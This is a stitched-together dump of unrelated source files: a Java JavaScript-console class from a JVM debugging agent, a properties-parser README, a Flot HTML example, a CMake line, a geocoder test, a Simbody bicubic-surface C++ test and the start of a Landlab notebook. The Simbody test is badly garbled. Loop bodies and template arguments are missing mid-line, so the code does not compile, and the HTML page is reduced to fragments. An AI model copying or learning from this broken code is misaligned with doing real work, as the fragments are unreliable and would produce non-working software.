For other type of objects, the result is undefined.\n */\n public Object identityHash(Object[] args) {\n if (args.length != 1) return UNDEFINED;\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return new Long(((JSJavaObject)o).getOop().identityHash());\n } else {\n return UNDEFINED;\n }\n }\n\n\n /**\n * Load and execute a set of JavaScript source files.\n * This method is defined as a JavaScript function.\n */\n public void load(Object[] args) {\n for (int i = 0; i < args.length; i++) {\n processSource(args[i].toString());\n }\n }\n\n /**\n mirror function creats local copy of the Oop wrapper supplied.\n if mirror can not be created, return undefined. For other types,\n mirror is undefined.\n */\n public Object mirror(Object[] args) {\n Object o = args[0];\n Object res = UNDEFINED;\n if (o != null) {\n if (o instanceof JSJavaObject) {\n Oop oop = ((JSJavaObject)o).getOop();\n try {\n res = getObjectReader().readObject(oop);\n } catch (Exception e) {\n if (debug) e.printStackTrace(getErrorStream());\n }\n } else if (o instanceof JSMetadata) {\n Metadata metadata = ((JSMetadata)o).getMetadata();\n try {\n if (metadata instanceof InstanceKlass) {\n res = getObjectReader().readClass((InstanceKlass) metadata);\n }\n } catch (Exception e) {\n if (debug) e.printStackTrace(getErrorStream());\n }\n }\n }\n return res;\n }\n\n /**\n owner function gets owning thread of given JSJavaObjec, if any, else\n returns null. For other type of objects, the result is undefined.\n */\n public Object owner(Object[] args) {\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return getOwningThread((JSJavaObject)o);\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n object function takes a string address and returns a JSJavaObject.\n For other type of objects, the result is undefined.\n */\n public Object object(Object[] args) {\n Object o = args[0];\n if (o != null && o instanceof String) {\n VM vm = VM.getVM();\n Address addr = vm.getDebugger().parseAddress((String)o);\n Oop oop = vm.getObjectHeap().newOop(addr.addOffsetToAsOopHandle(0));\n return getJSJavaFactory().newJSJavaObject(oop);\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n sizeof function returns size of a Java object in bytes. For other type\n of objects, the result is undefined.\n */\n public Object sizeof(Object[] args) {\n if (args.length != 1) return UNDEFINED;\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return new Long(((JSJavaObject)o).getOop().getObjectSize());\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n staticof function gets static field of given class. Both class and\n field name are specified as strings. 
undefined is returned if there is\n no such named field.\n */\n public Object staticof(Object[] args) {\n Object classname = args[0];\n Object fieldname = args[1];\n if (fieldname == null || classname == null ||\n !(fieldname instanceof String)) {\n return UNDEFINED;\n }\n\n InstanceKlass ik = null;\n if (classname instanceof JSJavaClass) {\n JSJavaClass jclass = (JSJavaClass) classname;\n JSJavaKlass jk = jclass.getJSJavaKlass();\n if (jk != null && jk instanceof JSJavaInstanceKlass) {\n ik = ((JSJavaInstanceKlass)jk).getInstanceKlass();\n }\n } else if (classname instanceof String) {\n ik = SystemDictionaryHelper.findInstanceKlass((String)classname);\n } else {\n return UNDEFINED;\n }\n\n if (ik == null) {\n return UNDEFINED;\n }\n JSJavaFactory factory = getJSJavaFactory();\n try {\n return ((JSJavaInstanceKlass) factory.newJSJavaKlass(ik)).getStaticFieldValue((String)fieldname);\n } catch (NoSuchFieldException e) {\n return UNDEFINED;\n }\n }\n\n /**\n * read function reads a single line of input from standard input\n */\n public Object read(Object[] args) {\n BufferedReader in = getInputReader();\n if (in == null) {\n return null;\n }\n if (args.length > 0) {\n print(args[0].toString());\n print(\":\");\n }\n try {\n return in.readLine();\n } catch (IOException exp) {\n exp.printStackTrace();\n throw new RuntimeException(exp);\n }\n }\n\n /**\n * Quit the shell.\n * This only affects the interactive mode.\n */\n public void quit(Object[] args) {\n quit();\n }\n\n public void writeln(Object[] args) {\n for (int i = 0; i < args.length; i++) {\n print(args[i].toString());\n print(\" \");\n }\n println(\"\");\n }\n\n public void write(Object[] args) {\n for (int i = 0; i < args.length; i++) {\n print(args[i].toString());\n print(\" \");\n }\n }\n\n //-- Internals only below this point\n protected void start(boolean console) {\n ScriptContext context = engine.getContext();\n OutputStream out = getOutputStream();\n if (out != null) {\n context.setWriter(new PrintWriter(out));\n }\n OutputStream err = getErrorStream();\n if (err != null) {\n context.setErrorWriter(new PrintWriter(err));\n }\n // load \"sa.js\" initialization file\n loadInitFile();\n // load \"~/jsdb.js\" (if found) to perform user specific\n // initialization steps, if any.\n loadUserInitFile();\n\n JSJavaFactory fac = getJSJavaFactory();\n JSJavaVM jvm = (fac != null)? fac.newJSJavaVM() : null;\n // call \"main\" function from \"sa.js\" -- main expects\n // 'this' object and jvm object\n call(\"main\", new Object[] { this, jvm });\n\n // if asked, start read-eval-print console\n if (console) {\n processSource(null);\n }\n }\n\n protected JSJavaScriptEngine(boolean debug) {\n this.debug = debug;\n ScriptEngineManager manager = new ScriptEngineManager();\n engine = manager.getEngineByName(\"javascript\");\n if (engine == null) {\n throw new RuntimeException(\"can't load JavaScript engine\");\n }\n Method[] methods = getClass().getMethods();\n for (int i = 0; i < methods.length; i++) {\n Method m = methods[i];\n if (! 
Modifier.isPublic(m.getModifiers())) {\n continue;\n }\n Class[] argTypes = m.getParameterTypes();\n if (argTypes.length == 1 &&\n argTypes[0] == Object[].class) {\n putFunction(this, m);\n }\n }\n }\n\n protected JSJavaScriptEngine() {\n this(false);\n }\n\n protected abstract ObjectReader getObjectReader();\n protected abstract JSJavaFactory getJSJavaFactory();\n protected void printPrompt(String str) {\n System.err.print(str);\n System.err.flush();\n }\n\n protected void loadInitFile() {\n InputStream is = JSJavaScriptEngine.class.getResourceAsStream(\"sa.js\");\n BufferedReader reader = new BufferedReader(new InputStreamReader(is));\n evalReader(reader, \"sa.js\");\n }\n\n protected void loadUserInitFile() {\n File initFile = new File(getUserInitFileDir(), getUserInitFileName());\n if (initFile.exists() && initFile.isFile()) {\n // load the init script\n processSource(initFile.getAbsolutePath());\n }\n }\n\n protected String getUserInitFileDir() {\n return System.getProperty(\"user.home\");\n }\n\n protected String getUserInitFileName() {\n return \"jsdb.js\";\n }\n\n protected BufferedReader getInputReader() {\n if (inReader == null) {\n inReader = new BufferedReader(new InputStreamReader(System.in));\n }\n return inReader;\n }\n\n protected PrintStream getOutputStream() {\n return System.out;\n }\n\n protected PrintStream getErrorStream() {\n return System.err;\n }\n\n protected void print(String name) {\n getOutputStream().print(name);\n }\n\n protected void println(String name) {\n getOutputStream().println(name);\n }\n\n protected void printError(String message) {\n printError(message, null);\n }\n\n protected void printError(String message, Exception exp) {\n getErrorStream().println(message);\n if (exp != null && debug) {\n exp.printStackTrace(getErrorStream());\n }\n }\n\n protected boolean isQuitting() {\n return quitting;\n }\n\n protected void quit() {\n quitting = true;\n }\n\n protected ScriptEngine getScriptEngine() {\n return engine;\n }\n\n private JSJavaThread getOwningThread(JSJavaObject jo) {\n Oop oop = jo.getOop();\n Mark mark = oop.getMark();\n ObjectMonitor mon = null;\n Address owner = null;\n JSJavaThread owningThread = null;\n // check for heavyweight monitor\n if (! mark.hasMonitor()) {\n // check for lightweight monitor\n if (mark.hasLocker()) {\n owner = mark.locker().getAddress(); // save the address of the Lock word\n }\n // implied else: no owner\n } else {\n // this object has a heavyweight monitor\n mon = mark.monitor();\n\n // The owner field of a heavyweight monitor may be NULL for no\n // owner, a JavaThread * or it may still be the address of the\n // Lock word in a JavaThread's stack. 
A monitor can be inflated\n // by a non-owning JavaThread, but only the owning JavaThread\n // can change the owner field from the Lock word to the\n // JavaThread * and it may not have done that yet.\n owner = mon.owner();\n }\n\n // find the owning thread\n if (owner != null) {\n JSJavaFactory factory = getJSJavaFactory();\n owningThread = (JSJavaThread) factory.newJSJavaThread(VM.getVM().getThreads().owningThreadFromMonitor(owner));\n }\n return owningThread;\n }\n\n /**\n * Evaluate JavaScript source.\n * @param filename the name of the file to compile, or null\n * for interactive mode.\n */\n private void processSource(String filename) {\n if (filename == null) {\n BufferedReader in = getInputReader();\n String sourceName = \"\";\n int lineno = 0;\n boolean hitEOF = false;\n do {\n int startline = lineno;\n printPrompt(\"jsdb> \");\n Object source = read(EMPTY_ARRAY);\n if (source == null) {\n hitEOF = true;\n break;\n }\n lineno++;\n Object result = evalString(source.toString(), sourceName, startline);\n if (result != null) {\n printError(result.toString());\n }\n if (isQuitting()) {\n // The user executed the quit() function.\n break;\n }\n } while (!hitEOF);\n } else {\n Reader in = null;\n try {\n in = new BufferedReader(new FileReader(filename));\n evalReader(in, filename);\n } catch (FileNotFoundException ex) {\n println(\"File '\" + filename + \"' not found\");\n throw new RuntimeException(ex);\n }\n }\n }\n\n protected Object evalString(String source, String filename, int lineNum) {\n try {\n engine.put(ScriptEngine.FILENAME, filename);\n return engine.eval(source);\n } catch (ScriptException sexp) {\n printError(sexp.toString(), sexp);\n } catch (Exception exp) {\n printError(exp.toString(), exp);\n }\n return null;\n }\n\n private Object evalReader(Reader in, String filename) {\n try {\n engine.put(ScriptEngine.FILENAME, filename);\n return engine.eval(in);\n } catch (ScriptException sexp) {\n System.err.println(sexp);\n printError(sexp.toString(), sexp);\n } finally {\n try {\n in.close();\n } catch (IOException ioe) {\n printError(ioe.toString(), ioe);\n }\n }\n return null;\n }\n\n // lazily initialized input reader\n private BufferedReader inReader;\n // debug mode or not\n protected final boolean debug;\n private boolean quitting;\n // underlying jsr-223 script engine\n private ScriptEngine engine;\n}\n"} {"text": "# node-properties-parser\n\nA parser for [.properties](http://en.wikipedia.org/wiki/.properties) files written in javascript. Properties files store key-value pairs. They are typically used for configuration and internationalization in Java applications as well as in Actionscript projects. Here's an example of the format:\n\n\t# You are reading the \".properties\" entry.\n\t! The exclamation mark can also mark text as comments.\n\twebsite = http://en.wikipedia.org/\n\tlanguage = English\n\t# The backslash below tells the application to continue reading\n\t# the value onto the next line.\n\tmessage = Welcome to \\\n\t Wikipedia!\n\t# Add spaces to the key\n\tkey\\ with\\ spaces = This is the value that could be looked up with the key \"key with spaces\".\n\t# Unicode\n\ttab : \\u0009\n*(taken from [Wikipedia](http://en.wikipedia.org/wiki/.properties#Format))*\n\nCurrently works with any version of node.js.\n\n## The API\n\n- `parse(text)`: Parses `text` into key-value pairs. Returns an object containing the key-value pairs.\n- `read(path[, callback])`: Opens the file specified by `path` and calls `parse` on its content. 
If the optional `callback` parameter is provided, the result is then passed to it as the second parameter. If an error occurs, the error object is passed to `callback` as the first parameter. If `callback` is not provided, the file specified by `path` is synchronously read and calls `parse` on its contents. The resulting object is immediately returned.\n- `createEditor([path[, callback]])`: If neither `path` or `callback` are provided an empty editor object is returned synchronously. If only `path` is provided, the file specified by `path` is synchronously read and parsed. An editor object with the results in then immediately returned. If both `path` and `callback` are provided, the file specified by `path` is read and parsed asynchronously. An editor object with the results are then passed to `callback` as the second parameters. If an error occurs, the error object is passed to `callback` as the first parameter.\n- `Editor`: The editor object is returned by `createEditor`. Has the following API:\n\t- `get(key)`: Returns the value currently associated with `key`.\n\t- `set(key, [value[, comment]])`: Associates `key` with `value`. An optional comment can be provided. If `value` is not specified or is `null`, then `key` is unset.\n\t- `unset(key)`: Unsets the specified `key`.\n\t- `save([path][, callback]])`: Writes the current contents of this editor object to a file specified by `path`. If `path` is not provided, then it'll be defaulted to the `path` value passed to `createEditor`. The `callback` parameter is called when the file has been written to disk.\n\t- `addHeadComment`: Added a comment to the head of the file.\n\t- `toString`: Returns the string representation of this properties editor object. This string will be written to a file if `save` is called.\n\n## Getting node-properties-parser\n\nThe easiest way to get node-properties-parser is with [npm](http://npmjs.org/):\n\n\tnpm install properties-parser\n\nAlternatively you can clone this git repository:\n\n\tgit://github.com/xavi-/node-properties-parser.git\n\n## Developed by\n* Xavi Ramirez\n\n## License\nThis project is released under [The MIT License](http://www.opensource.org/licenses/mit-license.php)."} {"text": "\n\n\n\t\n\tFlot Examples: Adding Annotations\n\t\n\t\n\t\n\t\n\t\n\n\n\n\t
\n\t\tAdding Annotations\n\n\t\t
Flot has support for simple background decorations such as lines and rectangles. They can be useful for marking up certain areas. You can easily add any HTML you need with standard DOM manipulation, e.g. for labels. For drawing custom shapes there is also direct access to the canvas.
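The page's original script is not preserved in this extract; purely as a rough illustration of what the paragraph describes, a minimal sketch using Flot's documented grid.markings option plus plain DOM manipulation for a label might look like the following (it assumes jQuery and jquery.flot.js are loaded and that a relatively-positioned #placeholder element exists; those names are assumptions, not taken from this page):

	// Sketch only: background decorations via grid.markings, a label via DOM manipulation.
	$(function () {
		var d1 = [];
		for (var i = 0; i < 20; i += 0.5) {
			d1.push([i, Math.sin(i)]);
		}

		var placeholder = $("#placeholder"); // assumed demo container
		var plot = $.plot(placeholder, [d1], {
			grid: {
				markings: [
					// shaded horizontal bands above y=1 and below y=-1
					{ color: "#f6f6f6", yaxis: { from: 1 } },
					{ color: "#f6f6f6", yaxis: { to: -1 } },
					// a thin vertical line at x=2
					{ color: "#000", lineWidth: 1, xaxis: { from: 2, to: 2 } }
				]
			}
		});

		// Place an HTML label near the point (2, -1.2) using pointOffset().
		var o = plot.pointOffset({ x: 2, y: -1.2 });
		placeholder.append(
			"<div style='position:absolute;left:" + (o.left + 4) + "px;top:" + o.top + "px;color:#666'>Annotation</div>"
		);
	});

For custom shapes, the same plot object also exposes the canvas (e.g. via plot.getCanvas()), as the paragraph above notes.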

\n\n\t
\n\n\t
\n\t\tCopyright © 2007 - 2014 IOLA and Ole Laursen\n\t
\n\n\n\n"} {"text": "\nset(_compiler_id_pp_test \"defined(__IBMCPP__) && !defined(__COMPILER_VER__) && __IBMCPP__ >= 800\")\n\ninclude(\"${CMAKE_CURRENT_LIST_DIR}/IBMCPP-CXX-DetermineVersionInternal.cmake\")\n"} {"text": "'use strict';\n// Test geocoder_tokens\n\nconst tape = require('tape');\nconst Carmen = require('../..');\nconst mem = require('../../lib/sources/api-mem');\nconst queue = require('d3-queue').queue;\nconst addFeature = require('../../lib/indexer/addfeature'),\n queueFeature = addFeature.queueFeature,\n buildQueued = addFeature.buildQueued;\n\n(() => {\n const conf = {\n country: new mem({ maxzoom: 6 }, () => {}),\n place: new mem({ maxzoom: 6 }, () => {})\n };\n\n const c = new Carmen(conf);\n tape('index country - United States', (t) => {\n queueFeature(conf.country, {\n id: 1,\n properties: {\n 'carmen:text':'United States',\n 'carmen:center': [0,0],\n 'carmen:zxy': ['6/32/32']\n }\n }, t.end);\n });\n\n tape('index country - United Kingdom', (t) => {\n queueFeature(conf.country, {\n id: 2,\n properties: {\n 'carmen:text':'United Kingdom',\n 'carmen:center': [0, 1],\n 'carmen:zxy': ['6/32/32']\n }\n }, t.end);\n });\n\n tape('index places in the United States', (t) => {\n const q = queue(1);\n for (let i = 1; i <= 11; i++) q.defer((i, done) => {\n queueFeature(conf.place, {\n id:i,\n properties: {\n 'carmen:text':'place ' + i,\n 'carmen:center': [0,0],\n },\n geometry: {\n type: 'Point',\n coordinates: [0,0]\n }\n }, done);\n }, i);\n q.awaitAll(t.end);\n });\n\n tape('index place 1 in United Kingdom', (t) => {\n queueFeature(conf.place, {\n id: 50,\n properties: {\n 'carmen:text':'place 1',\n 'carmen:center': [0,1],\n },\n geometry: {\n type: 'Point',\n coordinates: [0,1]\n }\n }, t.end);\n });\n\n tape('build queued features', (t) => {\n const q = queue();\n Object.keys(conf).forEach((c) => {\n q.defer((cb) => {\n buildQueued(conf[c], cb);\n });\n });\n q.awaitAll(t.end);\n });\n\n tape('max_correction_length > query length', (t) => {\n // Number of words in the query = 6\n // parameterized max_correction_length = 5\n // this test case should not return results because we should not attempt fuzzy search\n // for a query whose length is greater than the max_correction_length\n c.geocode('place places 11 unitted states america however extreme', { max_correction_length: 0 }, (err, res) => {\n t.ifError(err);\n t.equals(res.features[0].relevance < 0.6, true, 'ok, returns a feature with relevance < 0.6');\n t.end();\n });\n });\n\n tape('max_correction_length <= query length', (t) => {\n // Number of words in the query = 6\n // default max_correction_length = 8\n // this test case should return results because we attempt fuzzy search\n // for a query whose length <= max_correction_length\n c.geocode('places places 11 unitted states america', { }, (err, res) => {\n t.ifError(err);\n t.deepEquals(res.features[0].place_name, 'place 11, United States', 'ok, returns a result when max_correction_length <= query length');\n t.end();\n });\n });\n\n tape('verifymatch_stack_limit=1', (t) => {\n // providing parameter verifymatch_stack_limit=1 reduces the number of indexes sent to VerifyMatch\n // only returns place 1 from the United States\n c.geocode('place 1 united', { autocomplete: true, verifymatch_stack_limit: 1 }, (err, res) => {\n t.ifError(err);\n t.deepEquals(res.features[0].place_name, 'place 1, United States', 'returns place 1 from United States');\n t.deepEquals(res.features[0].center, [0,0], 'Center for place 1 from United States');\n t.error(res.features[1], 
undefined, 'Does not include place 1 from United Kingdom');\n t.end();\n });\n });\n\n tape('verifymatch_stack_limit > 1', (t) => {\n // providing parameter verifymatch_stack_limit > 1 increases the number of indexes to verifymatch\n c.geocode('place 1 united', { autocomplete: true, verifymatch_stack_limit: 30 }, (err, res) => {\n t.ifError(err);\n t.deepEquals(res.features[0].place_name, 'place 1, United States', 'returns place 1 from United States');\n t.deepEquals(res.features[0].center, [0,0], 'Center for place 1 from United States');\n t.deepEquals(res.features[1].center, [0,1], 'Includes results for id.112 place 1');\n t.end();\n });\n });\n})();\n"} {"text": "/* -------------------------------------------------------------------------- *\n * Simbody(tm): SimTKmath *\n * -------------------------------------------------------------------------- *\n * This is part of the SimTK biosimulation toolkit originating from *\n * Simbios, the NIH National Center for Physics-Based Simulation of *\n * Biological Structures at Stanford, funded under the NIH Roadmap for *\n * Medical Research, grant U54 GM072970. See https://simtk.org/home/simbody. *\n * *\n * Portions copyright (c) 2011-12 Stanford University and the Authors. *\n * Authors: Matthew Millard *\n * Contributors: Michael Sherman *\n * *\n * Licensed under the Apache License, Version 2.0 (the \"License\"); you may *\n * not use this file except in compliance with the License. You may obtain a *\n * copy of the License at http://www.apache.org/licenses/LICENSE-2.0. *\n * *\n * Unless required by applicable law or agreed to in writing, software *\n * distributed under the License is distributed on an \"AS IS\" BASIS, *\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *\n * See the License for the specific language governing permissions and *\n * limitations under the License. *\n * -------------------------------------------------------------------------- */\n\n#include \"SimTKmath.h\"\n\n// Include the private implementation class declaration for testing purposes;\n// this is not part of the API.\n#include \"../src/BicubicSurface_Guts.h\"\n\n\n#include \n#include \n#include \n\nusing namespace SimTK;\nusing namespace std;\n\n/**\nThis function computes a standard central difference dy/dx. 
\nIf extrap_endpoints is set to 1, then the derivative at the end points \nis estimated by linearly extrapolating the dy/dx values beside the end points\n\n @param x domain vector\n @param y range vector\n @param extrap_endpoints:(false) Endpoints of the returned vector will be zero, \n because a central difference is undefined at \n these endpoints\n (true) Endpoints are computed by linearly \n extrapolating using a first difference from \n the neighboring 2 points\n\n @returns dy/dx computed using central differences\n*/\nVector getCentralDifference(Vector x, Vector y, bool extrap_endpoints) {\n Vector dy(x.size());\n Real dx1,dx2;\n Real dy1,dy2;\n int size = x.size();\n for(int i=1; i fx(1); //Arguments required to get the correct derivative \n Array_ fy(1); // from the calcDerivatie interface\n Array_ fxy(ifxy,ifxy+2);\n Array_ fxx(ifxx,ifxx+2);\n Array_ fyy(ifyy,ifyy+2);\n Array_ fxxx(ifxxx,ifxxx+3);\n Array_ fyyy(ifyyy,ifyyy+3);\n Array_ fxxy(ifxxy,ifxxy+3);\n Array_ fxyy(ifxyy,ifxyy+3); \n\n fx[0] =0;\n fy[0] =1;\n\n errV = 0;\n errVM = 0;\n\n Matrix fk(size,size),fxk(size,size),fyk(size,size);\n Matrix fxyk(size,size),fxxk(size,size),fyyk(size,size);\n Matrix fxxyk(size,size),fxyyk(size,size);\n Matrix fxxxk(size,size),fyyyk(size,size);\n\n Matrix fMk(size-1,size-1),fxMk(size-1,size-1),fyMk(size-1,size-1);\n Matrix fxyMk(size-1,size-1),fxxMk(size-1,size-1),fyyMk(size-1,size-1);\n Matrix fxxyMk(size-1,size-1),fxyyMk(size-1,size-1);\n Matrix fxxxMk(size-1,size-1),fyyyMk(size-1,size-1);\n\n for(int i=0; i 1e-4 ){\n printf(\"Analytic (x,y),f,fx,fy,fxy: (%g,%g),%g, %g, %g, %g\\n\",\n x(i),y(j),z(i,j),zx(i,j),zy(i,j),zxy(i,j));\n printf(\"Approx. (x,y),f,fx,fy,fxy: (%g,%g),%g, %g, %g, %g\\n\\n\",\n x(i),y(j),fk(i,j),fxk(i,j),fyk(i,j),fxyk(i,j));\n bcs.setDebug(true);\n }*/\n\n if(i fT, aV, fV, fVerr;\n Mat<16,16> AM(A), ATest;\n\n //Initialize the grid\n for(int i=0; i derivX(1);\n Array_ derivY(1);\n Array_ derivXY(2);\n Array_ derivXX(2);\n Array_ derivYY(2);\n Array_ derivXXY(3);\n Array_ derivXYY(3);\n Array_ derivXXX(3);\n Array_ derivYYY(3);\n Array_ deriv4X(4);\n Array_ deriv4Y(4);\n\n derivX[0] = 0;\n derivY[0] = 1;\n derivXY[0]= 0;\n derivXY[1]= 1;\n derivXX[0]= 0;\n derivXX[1]= 0;\n derivYY[0]= 1;\n derivYY[1]= 1;\n derivXXY[0]= 0;\n derivXXY[1]= 0;\n derivXXY[2]= 1;\n derivXYY[0]= 0;\n derivXYY[1]= 1;\n derivXYY[2]= 1;\n derivXXX[0]= 0;\n derivXXX[1]= 0;\n derivXXX[2]= 0;\n derivYYY[0]= 1;\n derivYYY[1]= 1;\n derivYYY[2]= 1;\n for(int i=0;i<4;i++){\n deriv4X[i]=0;\n deriv4Y[i]=1;\n }\n\n //Function computed derivatives\n Matrix bcsF(tsize,tsize), bcsFx(tsize,tsize), bcsFy(tsize,tsize);\n Matrix bcsFxy(tsize,tsize), bcsFxx(tsize,tsize), bcsFyy(tsize,tsize);\n Matrix bcsFxxy(tsize,tsize), bcsFxyy(tsize,tsize), bcsFxxx(tsize,tsize);\n Matrix bcsFyyy(tsize,tsize), bcsF4x(tsize,tsize), bcsF4y(tsize,tsize);\n\n //Numerically computed derivatives\n Matrix numFx(tsize,tsize), numFy(tsize,tsize);\n Matrix numFxy(tsize,tsize), numFxx(tsize,tsize), numFyy(tsize,tsize);\n Matrix numFxxy(tsize,tsize), numFxyy(tsize,tsize), numFxxx(tsize,tsize);\n Matrix numFyyy(tsize,tsize);\n\n aXY(0) = xV(1);\n aXY(1) = yV(1);\n\n //Sample the surface about aXY over a 17x17 grid\n for(int i=0;i dX(1);\n Array_ dY(1);\n Array_ dXY(2);\n Array_ dXX(2);\n Array_ dYY(2);\n Array_ dXXY(3);\n Array_ dXYY(3);\n Array_ dXXX(3);\n Array_ dYYY(3);\n Array_ d4X(4);\n Array_ d4Y(4);\n\n dX[0] = 0;\n dY[0] = 1;\n dXY[0]= 0;\n dXY[1]= 1;\n dXX[0]= 0;\n dXX[1]= 0;\n dYY[0]= 1;\n dYY[1]= 1;\n dXXY[0]= 0;\n dXXY[1]= 
0;\n dXXY[2]= 1;\n dXYY[0]= 0;\n dXYY[1]= 1;\n dXYY[2]= 1;\n dXXX[0]= 0;\n dXXX[1]= 0;\n dXXX[2]= 0;\n dYYY[0]= 1;\n dYYY[1]= 1;\n dYYY[2]= 1;\n\nfor(int i=0;i<16;i++){\n aXY(0) = xmin + i*deltaX;\n for(int j=0;j<16;j++){\n aXY(1) = ymin + j*deltaY;\n SimTK_TEST_EQ(bcsf.calcValue(aXY), bcsCCf.calcValue(aXY));\n SimTK_TEST_EQ(bcsf.calcValue(aXY),bcsEQOPf.calcValue(aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dX,aXY), bcsCCf.calcDerivative(dX,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dX,aXY),bcsEQOPf.calcDerivative(dX,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dY,aXY), bcsCCf.calcDerivative(dY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dY,aXY),bcsEQOPf.calcDerivative(dY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXY,aXY), bcsCCf.calcDerivative(dXY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXY,aXY),bcsEQOPf.calcDerivative(dXY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXY,aXY), bcsCCf.calcDerivative(dXXY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXY,aXY),bcsEQOPf.calcDerivative(dXXY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXYY,aXY), bcsCCf.calcDerivative(dXYY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXYY,aXY),bcsEQOPf.calcDerivative(dXYY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXX,aXY), bcsCCf.calcDerivative(dXXX,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXX,aXY),bcsEQOPf.calcDerivative(dXXX,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dYYY,aXY), bcsCCf.calcDerivative(dYYY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dYYY,aXY),bcsEQOPf.calcDerivative(dYYY,aXY));\n }\n}\n\n}\n\nvoid testHint() {\n const Real xData[4] = { .1, 1, 2, 10 };\n const Real yData[5] = { -3, -2, 0, 1, 3 };\n const Real fData[] = { 1, 2, 3, 4, 5,\n 1.1, 2.1, 3.1, 4.1, 5.1,\n 1, 2, 3, 4, 5,\n 1.2, 2.2, 3.2, 4.2, 5.2 };\n const Vector x(4, xData);\n const Vector y(5, yData);\n const Matrix f(4,5, fData);\n BicubicSurface surf(x, y, f, 0); // not smoothed\n\n SimTK_TEST(surf.getNumAccesses() == 0);\n\n BicubicSurface::PatchHint hint;\n Real val = surf.calcValue(Vec2(.5, .5), hint);\n SimTK_TEST(surf.getNumAccesses() == 1);\n val = surf.calcValue(Vec2(.5, .5), hint); // should be free\n SimTK_TEST(surf.getNumAccesses() == 2);\n SimTK_TEST(surf.getNumAccessesSamePoint() == 1);\n\n val = surf.calcValue(Vec2(.50001, .50002), hint);\n SimTK_TEST(surf.getNumAccessesSamePatch() == 1);\n\n val = surf.calcValue(Vec2(1.5, -1), hint);\n SimTK_TEST(surf.getNumAccessesNearbyPatch() == 1);\n\n // This should report \"same patch\" rather than \"same point\" because\n // derivative info hasn't been calculated yet.\n Array_ deriv1(1, 1), deriv2(2, 0); // fy, fxx\n val = surf.calcDerivative(deriv2, Vec2(1.5, -1), hint);\n SimTK_TEST(surf.getNumAccessesSamePatch() == 2);\n\n // When 2nd deriv info is calculated we get 1st deriv also. So now\n // we should get \"same point\" even though we haven't asked for this yet.\n val = surf.calcDerivative(deriv1, Vec2(1.5, -1), hint);\n SimTK_TEST(surf.getNumAccessesSamePoint() == 2);\n\n}\n\nint main() {\n //Evaluate the bicubic surface interpolation against an analytical \n //function. 
Throw an error if the values of the function are different\n //at the knot points, or different within tolerance at the mid grid points\n SimTK_START_TEST(\"Testing Bicubic Interpolation\");\n SimTK_SUBTEST(testHint);\n\n cout << \"\\n---------------------------------------------\"<< endl;\n cout<< \"\\n\\nANALYTICAL FUNCTION COMPARISON:\" << endl;\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,0,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,1,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,2,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,3,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,4,false,false);\n printf(\"\\n\\n*Test Passed*. Constructor with x,y,f,fx,fy,fxy specified,\"\n \" \\n\\tSmoothness parameter %f tested\\n\"\n \"\\tAdditional smoothness parameters not tested because\"\n \"\\n\\tsurface will not pass through the knot points\",Real(0));\n cout << \"\\n---------------------------------------------\"<< endl;\n\n cout << \"\\n---------------------------------------------\"<< endl;\n cout << \"\\n\\nBICUBIC COEFFICIENT VALIDATION:\" << endl;\n cout << \" Testing that the bicubic interpolation coefficients\" <\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# How to write a Landlab component\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"
\\n\",\n \"For more Landlab tutorials, click here: https://landlab.readthedocs.io/en/latest/user_guide/tutorials.html\\n\",\n \"
\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"This ipython notebook walks you through the basic procedure for writing a Landlab component, using the example of a kinematic-wave flow model.\\n\",\n \"\\n\",\n \"## Overview\\n\",\n \"A Landlab component is implemented as a Python `class`. Although every Landlab component is unique in some respects, to be a component, a class must have at least the following standard ingredients:\\n\",\n \"\\n\",\n \"(1) The class must inherit the base class `Component`.\\n\",\n \"\\n\",\n \"(2) The class must include a set of standard variables defined in the header (i.e., before the `__init__` method), which describe the data arrays that the component uses.\\n\",\n \"\\n\",\n \"(3) The class must have an `__init__` method defined, with a semi-standardized parameter list described below.\\n\",\n \"\\n\",\n \"(4) The class must provide a function that does performs the component's \\\"action\\\", typically named `run_one_step()` and this function's parameter list must follow the convention described below.\\n\",\n \"\\n\",\n \"\\n\",\n \"## Class definition and header\\n\",\n \"\\n\",\n \"A Landlab component is a class that inherits from `Component`. The name of the class should be in CamelCase, and should make sense when used in the sentence: \\\"A *(component-name)* is a...\\\". The class definition should be followed by a docstring. The docstring should include a list of parameters for the `__init__` method and succintly describe them.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"import numpy as np\\n\",\n \"\\n\",\n \"from landlab import Component, FieldError\\n\",\n \"\\n\",\n \"\\n\",\n \"class KinwaveOverlandFlowModel(Component):\\n\",\n \" 